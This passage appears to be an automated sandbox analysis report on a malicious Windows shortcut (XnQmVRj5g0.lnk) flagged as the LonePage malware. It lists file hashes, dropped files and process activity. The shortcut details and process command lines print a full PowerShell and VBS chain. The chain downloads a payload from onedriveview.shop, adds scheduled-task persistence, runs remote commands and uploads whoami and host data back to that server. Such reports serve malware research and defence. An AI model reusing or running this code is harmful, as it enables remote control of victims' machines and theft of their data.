                                                                              Preview:...................................FL..................F.`.. ....4.0a....zp.=....p..=................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_.....2a....zp.=.....j.2.....>Y.l .XNQMVR~1.LNK..N......EW.>>Y.l..........................`)..X.n.Q.m.V.R.j.5.g.0...l.n.k.......X...............-.......W...........I........C:\Users\user\Desktop\XnQmVRj5g0.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e...............................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K2H1ZXRVAT56I9K688BJ.temp

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5380
                                                                              Entropy (8bit):3.452944844038945
                                                                              Encrypted:false
                                                                              SSDEEP:48:26Px8dE8dJ9JlAQHoMl6lSogZo3JDJagQHoMlJlSogZo3JDJO1:2tVyQHoMVH8QHoMYHN
                                                                              MD5:233274546747F1AE3702275535E1CF19
                                                                              SHA1:1A01D2A409808CD433CA2C99FCE5A38DAFC86B45
                                                                              SHA-256:9CADBA6F6CE3391EDEE158AF7D4F26131016D2A87CB655D000185A9F1B665514
                                                                              SHA-512:0AF1D00C1DFF127B467F915293795C1CCC4F4346CB61F234CF1BB9ADBEF1F870DD0C463042F0A5E69115790D47DC9AAA3B2B13845BB3A5BAB918E45EB5094FBD
                                                                              Malicious:false
                                                                              Preview:...................................FL..................F.`.. ....4.0a....zp.=....p..=................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_.....2a....zp.=.....j.2.....>Y.l .XNQMVR~1.LNK..N......EW.>>Y.l..........................`)..X.n.Q.m.V.R.j.5.g.0...l.n.k.......X...............-.......W...........I........C:\Users\user\Desktop\XnQmVRj5g0.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e...............................................................................................................................................

                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                              Static File Info

                                                                              General

                                                                              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Tue Sep 24 10:15:50 2024, mtime=Tue Sep 24 10:15:50 2024, atime=Tue Sep 24 10:15:50 2024, length=0, window=hide
                                                                              Entropy (8bit):4.148065228485815
                                                                              TrID:
                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                              File name:XnQmVRj5g0.lnk
                                                                              File size:4'626 bytes
                                                                              MD5:2fcd108de2e6877f79c4a05cb09488db
                                                                              SHA1:bf42aa0d6a60edee62736782933fb9212138e605
                                                                              SHA256:b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a
                                                                              SHA512:d499478df4cde52bd1b5611fee47160860efdc25a542cc177fadab5977fdac8238f0b51c251cb8b8533be9344179bb43b3fe56037aefc184ac98236df2edb605
                                                                              SSDEEP:96:8mLCxdPWYtUu9+3Enh5vynXS3STUAIJE+P3uaVnSbABZoALLloyIR:8mLCxdtSzsh5qXS3STqNX5I
                                                                              TLSH:CE9189353BEA1118F6B39F78BCF579C58DAEFA327D11994E4085024A4860B50DCA2B3E
                                                                              File Content Preview:L..................F............s.......s.......s................................P.O. .:i.....+00.../C:\...................V.1.....>Y....Windows.@........OwH>Y.Z.... .......................1.W.i.n.d.o.w.s.....Z.1.....8Y.A..System32..B........OwH>Y.Z......

                                                                              File Icon

                                                                              Icon Hash:dce4d4c4ccc9c96d

                                                                              Static Windows Shortcut Info

                                                                              General

                                                                              Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Command Line Argument:-w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
                                                                              Icon location:C:\program files\windows nt\accessories\wordpad.exe

                                                                              Network Behavior

                                                                              No network behavior found

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:1
                                                                              Start time:09:37:08
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000001.00000002.1318527100.00000219E1904000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000001.00000002.1318527100.00000219E1578000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:09:37:08
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:09:37:12
                                                                              Start date:30/09/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
                                                                              Imagebase:0x7ff702560000
                                                                              File size:5'641'176 bytes
                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:11
                                                                              Start time:09:37:13
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
                                                                              Imagebase:0x7ff67d5a0000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:09:37:15
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
                                                                              Imagebase:0x7ff79c160000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000C.00000002.1408855210.000001DD69175000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000C.00000002.1406068158.000001DD68FB2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000C.00000002.1406068158.000001DD68F77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000C.00000002.1406068158.000001DD68F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:09:37:16
                                                                              Start date:30/09/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                              Imagebase:0x7ff6c3ff0000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:14
                                                                              Start time:09:37:16
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:09:37:16
                                                                              Start date:30/09/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                              Imagebase:0x7ff6c3ff0000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:16
                                                                              Start time:09:37:20
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.2302216870.000002178C0C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.2360286566.00000217A600F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.2303633437.000002178F33A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:09:37:20
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:11:07:00
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
                                                                              Imagebase:0x7ff79c160000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001A.00000002.1916774143.0000012F1C33F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001A.00000002.1916774143.0000012F1C381000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001A.00000002.1917187862.0000012F1C465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001A.00000002.1916774143.0000012F1C39A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001A.00000002.1916774143.0000012F1C346000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:27
                                                                              Start time:11:07:01
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2661463505.000001E22AA70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2661463505.000001E22AABE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2699350373.000001E242BA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2658835860.000001E228A20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2699350373.000001E242B60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2661463505.000001E22B40C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001B.00000002.2661463505.000001E22A80C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:28
                                                                              Start time:11:07:01
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:31
                                                                              Start time:11:10:00
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
                                                                              Imagebase:0x7ff79c160000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001F.00000002.3716225104.0000019D57E46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001F.00000002.3716225104.0000019D57E98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001F.00000002.3716534823.0000019D580A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001F.00000002.3716225104.0000019D57E17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000001F.00000002.3716225104.0000019D57E7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:32
                                                                              Start time:11:10:01
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000020.00000002.3765597110.000001BD73D2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000020.00000002.3765597110.000001BD73CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000020.00000002.3733520219.000001BD00354000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000020.00000002.3733520219.000001BD0008C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
